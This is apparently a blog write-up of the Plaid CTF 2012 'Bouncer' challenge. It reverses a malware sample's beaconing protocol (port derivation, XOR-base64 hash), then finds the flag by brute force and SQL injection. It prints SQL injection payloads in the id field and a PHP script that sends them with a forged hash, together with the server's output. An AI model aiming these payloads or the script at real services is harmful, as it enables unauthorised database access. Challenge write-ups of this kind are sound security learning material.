01 May 2012

Plaid CTF 2012 – Bouncer

In a recent battle we took an enemy robot hostage and examined his operating system. During the examination we found a piece of robot malware that we don’t quite understand. Can you enumerate its targets?

We solved this challenge the pretty (sqli) and dirty (bruteforce) way.

First of all we ran the malware under strace. This showed several connections to the IP 174.129.48.200. We started a tcpdump to see exactly what was sent. It showed us the following data:

  • HTTP request to http://174.129.48.200:33123/
    GET /?salt=DEADBEEF HTTP/1.1
    Host: 174.129.48.200:33123
    Accept: */*

    HTTP/1.0 200 OK
    Server: BaseHTTP/0.3 Python/2.6.6
    Date: Sat, 28 Apr 2012 21:37:37 GMT
    Content-type: text/plain

    1847
  • HTTP request to http://174.129.48.200:8412
    GET /?id=1337&hash=MzExNQ%3D%3D HTTP/1.1
    Host: 174.129.48.200:8412
    Accept: */*

    HTTP/1.0 200 OK
    Server: B0Tz R U$ 1.1
    Date: Sat, 28 Apr 2012 21:37:37 GMT
    Content-type: text/plain

    127.0.0.1
  • A connection to 127.0.0.1 UDP: 9999, sending hello

So what it does is:

  • Connect to http://174.129.48.200:33123
  • Receive a number
  • Calculate a port number from it and connect to that port
  • Send a target id and the calculated hash
  • Receive the target
  • Send an evil UDP packet to the target

So, we had to find out how the port number and the hash were calculated. The port number is the received number multiplied by 4, plus 1024 (1847 * 4 + 1024 = 8412). The hash is the base64 encoding of the id with every character XORed with 2 (1337 becomes 3115, which encodes to MzExNQ==).
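As an added example (not part of the original write-up), the scheme described above, written as a checker for captured traffic: it derives the port from the salt reply, recomputes and inverts the hash, and parses a captured request to see whether it is consistent with the scheme and whether the id is a plain number. The capture below is constructed after the tcpdump output above; the helper names are my own.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed capture of the second beacon, modelled on the tcpdump output above.
CAPTURE = """GET /?id=1337&hash=MzExNQ%3D%3D HTTP/1.1
Host: 174.129.48.200:8412
Accept: */*
"""

def derive_port(salt_reply: int) -> int:
    """Port of the second request: the number from /?salt= times 4, plus 1024."""
    return salt_reply * 4 + 1024

def expected_hash(target_id: str) -> str:
    """hash parameter: base64 of the id with every byte XORed with 2."""
    return base64.b64encode(bytes(b ^ 2 for b in target_id.encode())).decode()

def recover_id(hash_param: str) -> str:
    """Invert expected_hash; XOR with 2 is its own inverse."""
    raw = base64.b64decode(unquote(hash_param))
    return bytes(b ^ 2 for b in raw).decode(errors="replace")

_REQUEST = re.compile(r"^GET (\S+) HTTP/1\.[01]$")
_HOST = re.compile(r"^Host: (\S+):(\d+)$")

def check_capture(capture: str, salt_reply: int) -> dict:
    """Parse one captured request and test it against the derived scheme.

    hash_ok / port_ok say whether the beacon matches the scheme; numeric_id
    is False for ids that are not plain numbers (such as an injection string).
    """
    path, port = None, None
    for line in capture.splitlines():
        if m := _REQUEST.match(line.strip()):
            path = m.group(1)
        elif m := _HOST.match(line.strip()):
            port = int(m.group(2))
    if path is None or port is None:
        raise ValueError("not a complete HTTP request")
    params = parse_qs(urlsplit(path).query)  # parse_qs already URL-decodes
    target_id, hash_param = params["id"][0], params["hash"][0]
    return {
        "id": target_id,
        "hash_ok": hash_param == expected_hash(target_id),
        "port_ok": port == derive_port(salt_reply),
        "numeric_id": target_id.isdigit(),
    }

if __name__ == "__main__":
    print(check_capture(CAPTURE, 1847))
```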

So at this point we could try to find other targets. We started trying ids and found one at id=0. We kept the brute force running while thinking about a better solution. Thinking about what the script was probably doing, it accepted an id, looked it up in a database and replied with a target. We tried some SQL injection and finally came up with id="1337'/**/or/**/1--".

The script below can be used to connect to the target and find the solution. After we found the solution the pretty way, we also saw that the brute force script had found the solution at id=65536 as well.

<?php
// Usage: php bounce.php <host> <id>
if (count($argv) != 3)
	die("usage: {$argv[0]} <host> <input>\n");

list($prog, $host, $inp) = $argv;

// The hash parameter is base64 of the id with every character XORed with 2.
$inpx = implode('', array_map(function($a) {
	return chr(ord($a) ^ 2);
}, str_split($inp)));

// The first request returns a number; the second port is number * 4 + 1024.
$salt = file_get_contents("http://{$host}:33123/?salt=DEADBEEF");
if ($salt === false)
	die("could not fetch the port number from {$host}:33123\n");
$port = (int)$salt * 4 + 1024;

// The second request sends the id and its hash; the reply is the target list.
echo file_get_contents(
	"http://{$host}:{$port}/?id=" . urlencode($inp) .
	"&hash=" . urlencode(base64_encode($inpx))
) . "\n";
?>
$ php bounce.php ec2-23-20-211-9.compute-1.amazonaws.com "1'/**/OR/**/1=1--"
10.0.0.1
127.0.0.1
Pwning1$m0reFunWhenTargetsBounce
$ php bounce.php ec2-23-20-211-9.compute-1.amazonaws.com 65536
Pwning1$m0reFunWhenTargetsBounce

One Response to “Plaid CTF 2012 – Bouncer”

  1. Very fun challenge. Great job with the write up!

    lbzzie